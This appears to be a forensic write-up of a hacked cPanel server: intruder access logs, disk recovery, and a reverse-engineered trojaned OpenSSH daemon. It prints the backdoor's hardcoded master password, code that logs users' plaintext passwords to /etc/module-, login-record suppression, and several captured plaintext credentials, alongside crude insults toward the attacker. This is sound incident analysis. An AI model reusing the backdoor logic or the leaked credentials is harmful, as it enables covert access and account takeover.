Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:15 -0000] "GET /cPanel_magic_revision_1231994899/yui/autocomplete/autocomplete.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:18 -0000] "GET /xml-api/accountsummary?user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:26 -0000] "GET /cPanel_magic_revision_1159323796/yui/container/assets/close12_1.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/cPanel_magic_revision_1231994907/themes/x/style_optimized.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:29 -0000] "GET /yui/treeview/assets/loading.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:31 -0000] "GET /scripts/display_package_info?pkg=Basic HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:32 -0000] "POST /scripts/passwd HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:52 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) 
Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:33:13 -0000] "GET /scripts2/securitycenter HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:33:29 -0000] "GET /scripts/modwheel HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:33:41 -0000] "GET /scripts/addwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:33:53 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:34:35 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:34:39 -0000] "GET /scripts2/manageshells HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:34:49 -0000] "GET /scripts2/domanageshells?shell=Enable+Normal+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:35:16 -0000] "GET 
/xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:36:18 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:37:19 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:38:00 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:39:01 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:39:49 -0000] "GET /scripts/modwheel HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:39:57 -0000] "GET /scripts/rmwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:40:02 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 
Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:40:13 -0000] "GET /scripts2/manageshells HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:40:18 -0000] "GET /scripts2/domanageshells?shell=Enable+Jailed+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:40:23 -0000] "GET /scripts/editsets HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:40:31 -0000] "POST /scripts/saveedits HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/editsets" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:40:40 -0000] "GET /logout/ HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:40:41 -0000] "GET /logout/ HTTP/1.1" 401 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:40:46 -0000] "GET /3rdparty/phpMyAdmin/db_structure.php?db=webhostl_hosting&token=8ca1ba8833931bc463e18a0da900681e HTTP/1.1" 401 0 
"https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=webhostl_hosting&table=tblclients&lang=en-utf-8&collation_connection=utf8_unicode_ci" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +root@srv01 [/home/recovery]# + +root@srv01 [/home/recovery/]# cat /tmp/access_log | grep "06/08" | grep crownvip | grep -v 91.184 +188.54.114.181 - root [06/08/2009:13:30:43 -0000] "GET /scripts/edituser?domain=crownvipservices.com&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts4/listaccts" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:18 -0000] "GET /xml-api/accountsummary?user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:33:41 -0000] "GET /scripts/addwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:34:49 -0000] "GET /scripts2/domanageshells?shell=Enable+Normal+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:39:57 -0000] "GET /scripts/rmwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:40:18 -0000] "GET 
/scripts2/domanageshells?shell=Enable+Jailed+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +root@srv01 [/home/recovery]# + +/* +RoMeO clearly has an issue with self image (probably to a tiny penis) and feels the need to fake things like +breaking out of a jail shell to make himself feel better. In fact, I'll bet that RoMeO +couldn't hack his way out of a wet tissue paper bag with a knife. +*/ + + +root@srv01 [/home/recovery]# du -h /tmp/access_log +13M access_log +root@srv01 [/home/recovery]# + +root@srv01 [/home/recovery]# strings /dev/sdb2 > stringfile_sdb2.txt +root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | head -n 25 +M0J +/var +4JcA.JcA.J +runt+found +cache +empty +games +local +lock +nisl +mail +preserve +spool +crash +racoon +account +cpanel +named +portsentry +aquota.userr.bz2 +profiles +quota.user +netenberg +haxtar.gz +ll.tar + +/* +A forensic investigation demonstrated that RoMeO was full of shit again. Clearly there was no grsec local exploit +and certainly no jailshell break tool or technique. During the investigation we identified two suspicious files +that were ll.tar and haxtar.gz. Those were in fact logpatch v1.1 (he can't write his own tools) and a real "weak" +attempt of modifying the OpenSSH daemon to add a backdoor. 
+*/ + +root@srv01 [/home/recovery]# cat sdb2output.txt | grep -A 1 hax +d/d * 983041(realloc): hax +r/r * 98310: ll.tar +root@srv01 [/home/recovery]# + +/* +With the use of sleuthkit in our investication we validated the existance of the hax directory and the ll.tar +file on /dev/sdb2 +*/ + +root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | grep hax +haxtar.gz +hax.tar +hax/ +hax/auth-sia.c +hax/msg.h +hax/fatal.c +hax/config.guess +hax/progressmeter.h +hax/hostfile.c +hax/sftp-client.h +hax/includes.h +hax/serverloop.h +hax/session.c +hax/ssh-agent.c +hax/scp.c +hax/loginrec.c +hax/bufaux.c +hax/auth-pam.h +hax/auth-sia.h +hax/ttymodes.h +hax/ssh-keygen.0 +hax/auth-rh-rsa.c +hax/auth-passwd.c +hax/key.h +hax/packet.c +hax/rsa.c +hax/compat.h +hax/authfile.c +hax/ssh-keysign.8 +hax/auth1.c +hax/readconf.c +hax/ssh2.h +hax/bufaux.h +hax/sftp.0 +hax/scard.c +hax/README.platform +hax/WARNING.RNG +hax/ssh_config.0 +hax/dns.c +hax/.cvsignore +hax/auth-krb5.c +hax/misc.h +hax/auth2-kbdint.c +hax/kex.c +hax/sftp-common.c +hax/log.c +hax/entropy.c +hax/sshlogin.c +hax/servconf.h +hax/cipher-aes.c +hax/atomicio.c +hax/xmalloc.c +hax/fixpaths +hax/sshtty.c +hax/fixprogs +hax/ttymodes.c +hax/auth.c +hax/auth2-pubkey.c +hax/dispatch.h +hax/rijndael.h +hax/misc.c +hax/sftp-server.c +hax/sshd.c +hax/scard-opensc.c +hax/serverloop.c +hax/readpass.c +hax/rsa.h +hax/ssh-keysign.c +hax/canohost.h +hax/ssh.0 +hax/aclocal.m4 +hax/ssh-rand-helper.0 +hax/deattack.h +hax/auth-bsdauth.c +hax/gss-serv.c +hax/monitor.h +hax/monitor_mm.h +hax/entropy.h +hax/ChangeLog +hax/log.h +hax/sshconnect.c +hax/kexgex.c +hax/sftp-server.0 +hax/auth.h +hax/deattack.c +hax/channels.c +hax/ssh-keygen.1 +hax/version.h +hax/sftp-glob.c +hax/nchan2.ms +hax/kexdhs.c +hax/ssh.1 +hax/groupaccess.h +hax/rijndael.c +hax/ssh_prng_cmds.in +hax/cipher-3des1.c +hax/mac.c +hax/configure +hax/cipher-ctr.c +hax/ssh-add.c +hax/gss-genr.c +hax/scp.1 +hax/TODO +hax/acss.c +hax/loginrec.h +hax/sftp-client.c 
+hax/progressmeter.c +hax/md5crypt.h +hax/opensshd.init.in +hax/moduli.c +hax/uuencode.c +hax/config.h.in +hax/buildpkg.sh.in +hax/auth2-gss.c +hax/nchan.c +hax/cleanup.c +hax/msg.c +hax/mac.h +hax/cipher-bf1.c +hax/kexdh.c +hax/auth-options.c +hax/moduli +hax/hostfile.h +hax/install-sh +hax/sshpty.h +hax/cipher.h +hax/auth-options.h +hax/monitor_wrap.h +hax/configure.ac +root@srv01 [/home/recovery]# + +// Familiar filenames for an unfamiliar poor coded backdoor + +root@srv01 [/home/recovery/sdb2recover/hax]# cat includes.h | grep -i hookar -A1 -B1 + +#define hookar "0x3aownt" +#define HOOKAR_LG "/etc/module-" +int hookarOn; + +root@srv01 [/home/recovery/sdb2recover/hax]# + + +root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | grep -B 10 module- +# undef _INCLUDE__STDC__ +# endif +#endif +#include /* For OPENSSL_VERSION_NUMBER */ +#include "defines.h" +#include "version.h" +#include "openbsd-compat/openbsd-compat.h" +#include "openbsd-compat/bsd-nextstep.h" +#include "entropy.h" +#define hookar "0x3aownt" +#define HOOKAR_LG "/etc/module-" + +/* +Partial source code recovered showing backdoor password. The rest of the code revealed the incoming +password logging that took place in /etc/module- which was used to hold captured data in paintext form +*/ + +root@srv01 [/home/recovery]# cat etc/module- | head -n 10 +login in: webhostl:kb>w5I@T&yK| +login in: webhostl:kb>w5I@T&yK| +login in: webhostl:kb>w5I@T&yK| +login in: webhostl:kb>w5I@T&yK| +login in: webhostl:kb>w5I@T&yK| +login in: x00mario:!&8bmHvt4--$ +login in: webhostl:kb>w5I@T&yK| +login in: x00mario:!&8bmHvt4--$ +login in: webhostl:kb>w5I@T&yK| +login in: webhostl:kb>w5I@T&yK| +root@srv01 [/home/recovery]# + + +chkrootkit reports 1 deletion of record: + +Checking `chkutmp'... The tty of the following user process(es) were not found + in /var/run/utmp ! +! RUID PID TTY CMD +! root 5193 tty2 /sbin/mingetty tty2 +! root 5194 tty3 /sbin/mingetty tty3 +! root 5197 tty4 /sbin/mingetty tty4 +! 
root 5211 tty5 /sbin/mingetty tty5 +! root 5216 tty6 /sbin/mingetty tty6 +chkutmp: nothing deleted +Checking `wted'... 1 deletion(s) between Tue Jun 8 11:40:56 2009 and Tue Jun 8 11:46:30 2009 + + +Infected SSHD Binary Reverce Code Engineering +--------------------------------------------- + +//Global definitions +FILE *log; //A pointer to the password dump file +char *EtcModule = "/etc/module-"; //filename array of chars +char *a0x3aownt = "0x3aownt"; // hardcoded backdoor password +int hookarOn; //A backdoor authentication flag + +//Standard passwd struct defined in pwd.h +struct passwd { + char *pw_name; + char *pw_passwd; + uid_t pw_uid; + gid_t pw_gid; + time_t pw_change; + char *pw_class; + char *pw_gecos; + char *pw_dir; + char *pw_shell; + time_t pw_expire; +}; +//OpenSSH Authctxt struct defined in auth.h +struct Authctxt { + int success; + int postponed; /* authentication needs another step */ + int valid; /* user exists and is allowed to login */ + int attempt; + int failures; + int force_pwchange; + char *user; /* username sent by the client */ + char *service; + struct passwd *pw; /* set if 'valid' */ + char *style; + void *kbdintctxt; +#ifdef BSD_AUTH + auth_session_t *as; +#endif +#ifdef KRB5 + krb5_context krb5_ctx; + krb5_ccache krb5_fwd_ccache; + krb5_principal krb5_user; + char *krb5_ticket_file; + char *krb5_ccname; +#endif + Buffer *loginmsg; + void *methoddata; +}; + + +/* +.text:0804FA68 public sys_auth_passwd +.text:0804FA68 sys_auth_passwd proc near ; CODE XREF: auth_password+71p +.text:0804FA68 +.text:0804FA68 arg_0 = dword ptr 8 +.text:0804FA68 arg_4 = dword ptr 0Ch +.text:0804FA68 +.text:0804FA68 push ebp +.text:0804FA69 mov ebp, esp +.text:0804FA6B push edi +.text:0804FA6C push esi +.text:0804FA6D push ebx +.text:0804FA6E sub esp, 0Ch +.text:0804FA71 mov eax, [ebp+arg_0] ; eax = authctxt +.text:0804FA74 mov ebx, [eax+8] +.text:0804FA77 test ebx, ebx +.text:0804FA79 mov edi, [ebp+arg_4] ; edi = password +.text:0804FA7C mov esi, [eax+20h] 
; esi = authctxt->pw +.text:0804FA7F jnz loc_804FB28 +.text:0804FA85 mov ebx, [esi+4] +.text:0804FA88 +.text:0804FA88 loc_804FA88: ; CODE XREF: sys_auth_passwd+CEj +.text:0804FA88 mov al, [ebx] +.text:0804FA8A test al, al +.text:0804FA8C jnz short loc_804FA98 +.text:0804FA8E cmp byte ptr [edi], 0 +.text:0804FA91 mov edx, 1 +.text:0804FA96 jz short loc_804FABD +.text:0804FA98 +.text:0804FA98 loc_804FA98: ; CODE XREF: sys_auth_passwd+24j +.text:0804FA98 sub esp, 8 +.text:0804FA9B test al, al +.text:0804FA9D jnz short loc_804FAC8 +.text:0804FA9F +.text:0804FA9F loc_804FA9F: ; CODE XREF: sys_auth_passwd+66j +.text:0804FA9F mov eax, offset aXx ; "xx" +.text:0804FAA4 push eax +.text:0804FAA5 push edi +.text:0804FAA6 call xcrypt +.text:0804FAAB pop edx +.text:0804FAAC pop ecx +.text:0804FAAD push ebx ; s2 +.text:0804FAAE push eax ; s1 +.text:0804FAAF call _strcmp +.text:0804FAB4 add esp, 10h +.text:0804FAB7 xor edx, edx +.text:0804FAB9 test eax, eax +.text:0804FABB jz short loc_804FAEC +.text:0804FABD +.text:0804FABD loc_804FABD: ; CODE XREF: sys_auth_passwd+2Ej +.text:0804FABD ; sys_auth_passwd+7Fj +.text:0804FABD lea esp, [ebp-0Ch] +.text:0804FAC0 pop ebx +.text:0804FAC1 pop esi +.text:0804FAC2 mov eax, edx +.text:0804FAC4 pop edi +.text:0804FAC5 leave +.text:0804FAC6 retn +.text:0804FAC6 ; --------------------------------------------------------------------------- +.text:0804FAC7 align 4 +.text:0804FAC8 +.text:0804FAC8 loc_804FAC8: ; CODE XREF: sys_auth_passwd+35j +.text:0804FAC8 cmp byte ptr [ebx+1], 0 +.text:0804FACC mov eax, ebx +.text:0804FACE jz short loc_804FA9F +.text:0804FAD0 push eax +.text:0804FAD1 push edi +.text:0804FAD2 call xcrypt +.text:0804FAD7 pop edx +.text:0804FAD8 pop ecx +.text:0804FAD9 push ebx ; s2 +.text:0804FADA push eax ; s1 +.text:0804FADB call _strcmp +.text:0804FAE0 add esp, 10h +.text:0804FAE3 xor edx, edx +.text:0804FAE5 test eax, eax +.text:0804FAE7 jnz short loc_804FABD +.text:0804FAE9 lea esi, [esi+0] +.text:0804FAEC +.text:0804FAEC 
loc_804FAEC: ; CODE XREF: sys_auth_passwd+53j +.text:0804FAEC sub esp, 8 +.text:0804FAEF push (offset aSshRsa+6) ; aSshRsa+6 = 'a' +.text:0804FAF4 push offset aEtcModule ; "/etc/module-" +.text:0804FAF9 call _fopen64 +.text:0804FAFE push edi +.text:0804FAFF push dword ptr [esi] ; esi = authctxt->pw, [esi] = pw->pw_name +.text:0804FB01 push offset aLoginInSS ; "login in: %s:%s\n" +.text:0804FB06 push eax ; stream +.text:0804FB07 mov ebx, eax +.text:0804FB09 call _fprintf +.text:0804FB0E add esp, 14h +.text:0804FB11 push ebx ; stream +.text:0804FB12 call _fclose +.text:0804FB17 lea esp, [ebp-0Ch] +.text:0804FB1A pop ebx +.text:0804FB1B pop esi +.text:0804FB1C mov edx, 1 +.text:0804FB21 mov eax, edx +.text:0804FB23 pop edi +.text:0804FB24 leave +.text:0804FB25 retn +.text:0804FB25 ; --------------------------------------------------------------------------- +.text:0804FB26 align 4 +.text:0804FB28 +.text:0804FB28 loc_804FB28: ; CODE XREF: sys_auth_passwd+17j +.text:0804FB28 sub esp, 0Ch +.text:0804FB2B push esi +.text:0804FB2C call shadow_pw +.text:0804FB31 mov ebx, eax +.text:0804FB33 add esp, 10h +.text:0804FB36 jmp loc_804FA88 +.text:0804FB36 sys_auth_passwd endp +*/ + +sys_auth_passwd(Authctxt *authctxt, const char *password) //BEGIN: Standard OpenSSH code +{ + struct passwd *pw = authctxt->pw; + char *encrypted_password; + + /* Just use the supplied fake password if authctxt is invalid */ + char *pw_password = authctxt->valid ? shadow_pw(pw) : pw->pw_passwd; + + /* Check for users with no password. */ + if (strcmp(pw_password, "") == 0 && strcmp(password, "") == 0) + return (1); + + /* Encrypt the candidate password using the proper salt. */ + encrypted_password = xcrypt(password, + (pw_password[0] && pw_password[1]) ? 
pw_password : "xx"); + + if(!strcmp(encrypted_password, pw_password) == 0) //END: Standard OpenSSH code + return 0; + + log = fopen64(EtcModule,"a"); //Open the log file + fprintf(log,"login in: %s:%s\n",pw->pw_name,password); //Print "login in: :\n" into the file + fclose(log); + return 1; //Return authenticated + /* //Replaced code + * Authentication is accepted if the encrypted passwords + * are identical. + */ + //return (strcmp(encrypted_password, pw_password) == 0); +} + + + + +/* +.text:0804FB3C public auth_password +.text:0804FB3C auth_password proc near ; CODE XREF: auth1_process_password+7Dp +.text:0804FB3C ; do_authentication+130p ... +.text:0804FB3C +.text:0804FB3C arg_0 = dword ptr 8 +.text:0804FB3C arg_4 = dword ptr 0Ch +.text:0804FB3C +.text:0804FB3C push ebp +.text:0804FB3D mov ebp, esp +.text:0804FB3F push edi +.text:0804FB40 push esi +.text:0804FB41 push ebx +.text:0804FB42 sub esp, 0Ch +.text:0804FB45 mov ebx, [ebp+arg_4] +.text:0804FB48 mov ds:hookarOn, 0 +.text:0804FB52 mov esi, ebx +.text:0804FB54 mov edi, offset a0x3aownt ; "0x3aownt" +.text:0804FB59 mov ecx, 9 +.text:0804FB5E cld +.text:0804FB5F repe cmpsb +.text:0804FB61 jnz short loc_804FB7C +.text:0804FB63 mov ds:hookarOn, 1 +.text:0804FB6D mov eax, 1 +.text:0804FB72 +.text:0804FB72 loc_804FB72: ; CODE XREF: auth_password+5Fj +.text:0804FB72 ; auth_password+89j ... +.text:0804FB72 lea esp, [ebp-0Ch] +.text:0804FB75 pop ebx +.text:0804FB76 pop esi +.text:0804FB77 pop edi +.text:0804FB78 leave +.text:0804FB79 retn +*/ + + +int +auth_password(Authctxt *authctxt, const char *password) +{ + struct passwd * pw = authctxt->pw; + int result, ok = authctxt->valid; + + hookarOn = 0; //Unset the hookarOn flag + if (!strcmp(password, a0x3aownt)) { //if provided password == backdoor password + hookarOn = 1; //Set the hookarOn flag + return 1; //Return authenticated + } + + //... 
+} + + +/* +.text:080508A0 public record_login +.text:080508A0 record_login proc near ; CODE XREF: do_login+F7p +.text:080508A0 ; mm_answer_pty+116p +.text:080508A0 +.text:080508A0 var_278 = dword ptr -278h +.text:080508A0 timer = dword ptr -25Ch +.text:080508A0 s = byte ptr -258h +.text:080508A0 var_58 = byte ptr -58h +.text:080508A0 var_57 = byte ptr -57h +.text:080508A0 arg_0 = dword ptr 8 +.text:080508A0 arg_4 = dword ptr 0Ch +.text:080508A0 arg_8 = dword ptr 10h +.text:080508A0 arg_C = dword ptr 14h +.text:080508A0 arg_10 = dword ptr 18h +.text:080508A0 arg_14 = dword ptr 1Ch +.text:080508A0 arg_18 = dword ptr 20h +.text:080508A0 +.text:080508A0 push ebp +.text:080508A1 mov ebp, esp +.text:080508A3 push edi +.text:080508A4 push esi +.text:080508A5 push ebx +.text:080508A6 sub esp, 25Ch +.text:080508AC mov edx, ds:hookarOn +.text:080508B2 test edx, edx +.text:080508B4 mov esi, [ebp+arg_8] +.text:080508B7 jnz short loc_8050910 +. +. +. +.text:08050910 loc_8050910: ; CODE XREF: record_login+17j +.text:08050910 lea esp, [ebp-0Ch] +.text:08050913 pop ebx +.text:08050914 pop esi +.text:08050915 pop edi +.text:08050916 leave +.text:08050917 retn +*/ + +/* + * Records that the user has logged in. I wish these parts of operating + * systems were more standardized. + */ +void +record_login(pid_t pid, const char *tty, const char *user, uid_t uid, + const char *host, struct sockaddr * addr, socklen_t addrlen) +{ + if(hookarOn) //If the hookarOn flag is set (backdoor authenticated user) + return; //return the record_login() function without executing the rest of the code + //... 
+ } + + +/* +.text:080509D0 public record_logout +.text:080509D0 record_logout proc near ; CODE XREF: session_pty_cleanup2+84p +.text:080509D0 +.text:080509D0 var_18 = dword ptr -18h +.text:080509D0 var_4 = dword ptr -4 +.text:080509D0 arg_0 = dword ptr 8 +.text:080509D0 arg_4 = dword ptr 0Ch +.text:080509D0 arg_8 = dword ptr 10h +.text:080509D0 +.text:080509D0 push ebp +.text:080509D1 mov ebp, esp +.text:080509D3 push ebx +.text:080509D4 push eax +.text:080509D5 mov ebx, ds:hookarOn +.text:080509DB test ebx, ebx +.text:080509DD mov ecx, [ebp+arg_0] +.text:080509E0 mov eax, [ebp+arg_4] +.text:080509E3 mov edx, [ebp+arg_8] +.text:080509E6 jz short loc_80509F0 +.text:080509E8 mov ebx, [ebp+var_4] +.text:080509EB leave +.text:080509EC retn +.text:080509EC ; --------------------------------------------------------------------------- +.text:080509ED align 10h +.text:080509F0 +.text:080509F0 loc_80509F0: ; CODE XREF: record_logout+16j +.text:080509F0 push eax +.text:080509F1 push 0 +.text:080509F3 push edx +.text:080509F4 push ecx +.text:080509F5 call login_alloc_entry +.text:080509FA mov ebx, eax +.text:080509FC mov [esp+18h+var_18], eax +.text:080509FF call login_logout +.text:08050A04 mov [ebp+arg_0], ebx +.text:08050A07 add esp, 10h +.text:08050A0A mov ebx, [ebp+var_4] +.text:08050A0D leave +.text:08050A0E jmp login_free_entry +.text:08050A0E record_logout endp +*/ + +/* Records that the user has logged out. 
